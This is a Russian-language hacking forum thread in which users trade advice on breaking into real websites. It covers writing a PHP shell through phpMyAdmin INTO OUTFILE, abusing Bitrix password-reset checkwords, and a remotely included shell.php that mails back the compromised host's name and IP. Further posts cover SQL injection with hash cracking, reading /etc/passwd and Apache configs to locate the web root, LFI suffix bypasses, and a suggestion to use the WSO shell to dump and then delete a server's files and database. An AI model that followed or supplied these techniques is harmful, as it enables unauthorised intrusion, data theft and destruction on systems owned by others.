Нашел админку phpMyAdmin (Version information: 3.4.10.2), крутится на Apache/2.2.3, CentOS. Есть доступ к root на phpMyAdmin. Как получить шелл? Смотрел видео типа: http://youtu.be/fiIO_X0gJoU Пробовал не выходит. В туториале все шаманится на Xampp под виндой. Очевидно нету прав на запись в директорию или не правильно указываю путь. Code: SELECT * FROM shell INTO OUTFILE '/var/www/shell.php'; Результат: Code: #1 - Can't create/write to file '/var/www/shell.php' (Errcode: 13) Ткните носом, плиз.
Вопрос по Bitrix: В БД в таблице юзер есть колонка "CHECKWORD" На сайте Битрикса в хелпе прочел что эта колонка содержит код для восстановления пароля. Насколько я понял - с помощю этого кода , как бы, можно поменять пасс. Зашел в восстановление пасса. Там есть поле для этого кода. Ввел. Но пишет что код не верный. Как же все таки работает восстановление в Битрикс? Кто знает? Может все таки нужно вначале нажимать на ссылку для восстановления пароля для отправки на мыло и тогда генерится новый код (а этот уже не рабочий, устаревший)? Или еще какая мутка?
Здравствуйте, есть у меня такой инклуд include("http://www.mysite.ru/shell.php"); Как мне определить на каких сайтах он работает, пробовал в файл shell.php засунуть такой код $ip=($_SERVER['SERVER_ADDR']); $host=($_SERVER['SERVER_NAME']); mail("[email protected]", "$host", "$host\n$ip"); но приходят данные сайта mysite.ru, а мне нужно удаленного(на котором он подключен)?
Нашёл на сайте SQL-inj. Данных для авторизации в админке там не было, но была таблица mysql. Разхешил пасс и попал в phpmyadmin(v 3.5.7). Остаётся только залить шелл, но я не нашёл полного пути. При попытке спровоцировать ошибку в скрипте с SQL-inj происходит редирект на 404. Так же есть READ FILE. Server type: Apache/2.2.24 (FreeBSD) PHP/5.4.10 mod_ssl/2.2.24 OpenSSL/0.9.8q DAV/2 (Speed: 0.04) Version: PHP/5.4.10 Собственно как можно раскрыть полный путь к сайту?? М.б. в логах каких-нибудь прочитать??
Ты вообще в курсе что такое apache? Ищи либо /etc/apache2/apache2.conf либо /etc/httpd/httpd.conf возможно другое название файла, но это самые распространенные, у тебя скорее всего первый вариант будет. А там (в этом файле) ищи расположение директории с файлами веб-сервера. p.s. а вообще советую установить apache на виртуалке и разобраться в настройках.
Я читал через Havij. etc/passwd - всё ок /etc/apache2/apache2.conf и /etc/httpd/httpd.conf ничего не выводит
Ты ручками научись сначала =) Что могу сказать, ищи конфиги, ищи! У phpmyadmin ищи, у всего что установлено ищи. стандарт проверь /var/www/index.php воображение включай и вперед.
Я же говорил, что там 404)) поэтому так)) А с путём кажется что определился: Code: /usr/local/www/site.ru Только вот прав кажись нету (( UP: Нашёл на сервере phpinfo. Можно ли как-то найти папку с правами на запись, что бы шелл залить? UPPP: всё, залил. всем спс)) PS Может кому пригодиться: расположение логов апача
Да в принципе можно тот же самый WSO. Через него удали все файлы на сервере и БД... Но рекомендую сделать dump всего =)
у меня есть доступ к файлам хостинга, кроме папки home, где собственно и лежат все сайты, доступ к которым я и хочу получить У меня есть доступ к папкам [ boot ] [ dev ] [ etc ] [ lib ] [ lib32 ] [ lib64 ] [ media ] [ mnt ] [ opt ] [ proc ] [ root ] [ sbin ] [ sys ] [ tmp ] [ usr ] [ var ] есть ли от них смысл? Могу ли я покопавшись в этих файлах найти что-то полезное?
Подскажите, а что, нет способа убрать суффикс в Local File Inclusion в PHP 5.3.3? Переполнение и нулевой байт не работают
